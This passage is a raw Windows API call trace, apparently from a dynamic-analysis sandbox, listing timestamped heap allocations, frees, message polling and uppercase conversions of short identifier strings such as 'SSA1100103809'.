out: hHeap=0x2af0000) returned 1 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0121.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0121.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0121.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0121.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0121.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0121.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0121.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0121.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0121.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0121.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0121.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0121.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0121.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0121.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0121.783] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0121.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0121.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0121.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0121.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0121.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0121.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.784] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0121.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0121.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0121.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0121.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0121.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0121.784] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0121.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0121.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0121.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0121.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0121.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0121.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0121.785] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0121.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0121.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa1c8 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0121.785] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0121.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0121.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0121.785] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0121.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0121.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0121.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0121.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0121.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0121.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0121.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0121.786] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0121.786] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0121.786] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0121.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0121.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa2b8 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743a0 [0121.786] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0121.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0121.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0121.787] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0121.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0121.787] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0121.787] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0121.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0121.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0121.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0121.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0121.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0121.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743a0 | out: hHeap=0x2af0000) returned 1 [0121.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0121.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0121.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0121.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0121.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0121.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0121.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0121.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0121.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0121.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0121.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0121.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0121.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0121.788] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0121.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0121.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa3d8 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74550 [0121.788] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0121.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0121.789] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0121.789] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0121.789] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0121.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0121.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0121.790] HeapFree 